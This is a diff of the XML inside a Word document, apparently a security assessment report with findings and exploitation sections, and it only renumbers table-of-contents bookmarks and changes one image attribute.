@@ -6540,7 +6540,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc71453313"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc71485044"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Finding 2 - </w:t>
@@ -6590,7 +6590,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="13" w:name="_Toc71453314"/>
+            <w:bookmarkStart w:id="13" w:name="_Toc71485045"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -6848,7 +6848,7 @@
               </w:rPr>
             </w:pPr>
             <w:bookmarkStart w:id="14" w:name="_Proof_of_Concept_1"/>
-            <w:bookmarkStart w:id="15" w:name="_Toc71453315"/>
+            <w:bookmarkStart w:id="15" w:name="_Toc71485046"/>
             <w:bookmarkEnd w:id="14"/>
             <w:r>
               <w:rPr>
@@ -7076,7 +7076,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="16" w:name="_Toc71453316"/>
+            <w:bookmarkStart w:id="16" w:name="_Toc71485047"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7211,7 +7211,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="17" w:name="_Toc71453317"/>
+            <w:bookmarkStart w:id="17" w:name="_Toc71485048"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7320,7 +7320,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="18" w:name="_Toc71453318"/>
+            <w:bookmarkStart w:id="18" w:name="_Toc71485049"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7395,7 +7395,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="19" w:name="_Toc71453319"/>
+            <w:bookmarkStart w:id="19" w:name="_Toc71485050"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7478,7 +7478,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="20" w:name="_Toc71453320"/>
+            <w:bookmarkStart w:id="20" w:name="_Toc71485051"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7583,7 +7583,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="_Toc71453321"/>
+      <w:bookmarkStart w:id="21" w:name="_Toc71485052"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Finding 3 - </w:t>
@@ -7633,7 +7633,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="22" w:name="_Toc71453322"/>
+            <w:bookmarkStart w:id="22" w:name="_Toc71485053"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7851,7 +7851,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="23" w:name="_Toc71453323"/>
+            <w:bookmarkStart w:id="23" w:name="_Toc71485054"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7938,7 +7938,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="24" w:name="_Toc71453324"/>
+            <w:bookmarkStart w:id="24" w:name="_Toc71485055"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8014,7 +8014,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="25" w:name="_Toc71453325"/>
+            <w:bookmarkStart w:id="25" w:name="_Toc71485056"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8120,7 +8120,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="26" w:name="_Toc71453326"/>
+            <w:bookmarkStart w:id="26" w:name="_Toc71485057"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8212,7 +8212,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="27" w:name="_Toc71453327"/>
+            <w:bookmarkStart w:id="27" w:name="_Toc71485058"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8343,7 +8343,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="28" w:name="_Toc71453328"/>
+            <w:bookmarkStart w:id="28" w:name="_Toc71485059"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8476,7 +8476,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="29" w:name="_Toc71453329"/>
+      <w:bookmarkStart w:id="29" w:name="_Toc71485060"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Finding </w:t>
@@ -8532,7 +8532,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="30" w:name="_Toc71453330"/>
+            <w:bookmarkStart w:id="30" w:name="_Toc71485061"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8635,7 +8635,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="31" w:name="_Toc71453331"/>
+            <w:bookmarkStart w:id="31" w:name="_Toc71485062"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8777,7 +8777,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="32" w:name="_Toc71453332"/>
+            <w:bookmarkStart w:id="32" w:name="_Toc71485063"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8929,7 +8929,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="33" w:name="_Toc71453333"/>
+            <w:bookmarkStart w:id="33" w:name="_Toc71485064"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9020,7 +9020,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="34" w:name="_Toc71453334"/>
+            <w:bookmarkStart w:id="34" w:name="_Toc71485065"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9108,7 +9108,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="35" w:name="_Toc71453335"/>
+            <w:bookmarkStart w:id="35" w:name="_Toc71485066"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9241,7 +9241,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="36" w:name="_Toc71453336"/>
+            <w:bookmarkStart w:id="36" w:name="_Toc71485067"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9662,7 +9662,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="37" w:name="_Toc71453337"/>
+      <w:bookmarkStart w:id="37" w:name="_Toc71485068"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Finding </w:t>
@@ -9737,7 +9737,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="38" w:name="_Toc71453338"/>
+            <w:bookmarkStart w:id="38" w:name="_Toc71485069"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9842,7 +9842,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="39" w:name="_Toc71453339"/>
+            <w:bookmarkStart w:id="39" w:name="_Toc71485070"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -10534,7 +10534,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="40" w:name="_Toc71453340"/>
+            <w:bookmarkStart w:id="40" w:name="_Toc71485071"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -10632,7 +10632,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="41" w:name="_Toc71453341"/>
+            <w:bookmarkStart w:id="41" w:name="_Toc71485072"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -10714,7 +10714,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="42" w:name="_Toc71453342"/>
+            <w:bookmarkStart w:id="42" w:name="_Toc71485073"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -10813,7 +10813,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="43" w:name="_Toc71453343"/>
+            <w:bookmarkStart w:id="43" w:name="_Toc71485074"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -10883,7 +10883,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="44" w:name="_Toc71453344"/>
+            <w:bookmarkStart w:id="44" w:name="_Toc71485075"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -11083,7 +11083,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="45" w:name="_Appendix_I_-"/>
-      <w:bookmarkStart w:id="46" w:name="_Toc71453345"/>
+      <w:bookmarkStart w:id="46" w:name="_Toc71485076"/>
       <w:bookmarkEnd w:id="45"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -11153,7 +11153,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="47" w:name="_Toc71453346"/>
+      <w:bookmarkStart w:id="47" w:name="_Toc71485077"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Appendix 2 - Additional Information</w:t>
@@ -11175,7 +11175,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="48" w:name="_Section_1_–"/>
-      <w:bookmarkStart w:id="49" w:name="_Toc71453347"/>
+      <w:bookmarkStart w:id="49" w:name="_Toc71485078"/>
       <w:bookmarkEnd w:id="48"/>
       <w:r>
         <w:rPr>
@@ -13239,7 +13239,7 @@
                           <a:blip r:embed="rId21" cstate="print">
                             <a:extLst>
                               <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                               </a:ext>
                             </a:extLst>
                           </a:blip>
@@ -13500,7 +13500,7 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:bookmarkStart w:id="50" w:name="_Section2_–_stored"/>
-      <w:bookmarkStart w:id="51" w:name="_Toc71453348"/>
+      <w:bookmarkStart w:id="51" w:name="_Toc71485079"/>
       <w:bookmarkEnd w:id="50"/>
       <w:r>
         <w:rPr>
@@ -13527,7 +13527,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="52" w:name="_Exploitation_1"/>
-      <w:bookmarkStart w:id="53" w:name="_Toc71453349"/>
+      <w:bookmarkStart w:id="53" w:name="_Toc71485080"/>
       <w:bookmarkEnd w:id="52"/>
       <w:r>
         <w:rPr>
@@ -14764,7 +14764,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="54" w:name="_Exploitation_2"/>
-      <w:bookmarkStart w:id="55" w:name="_Toc71453350"/>
+      <w:bookmarkStart w:id="55" w:name="_Toc71485081"/>
       <w:bookmarkEnd w:id="54"/>
       <w:r>
         <w:rPr>
@@ -15277,7 +15277,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="56" w:name="_Section_3_–"/>
-      <w:bookmarkStart w:id="57" w:name="_Toc71453351"/>
+      <w:bookmarkStart w:id="57" w:name="_Toc71485082"/>
       <w:bookmarkEnd w:id="56"/>
       <w:r>
         <w:rPr>
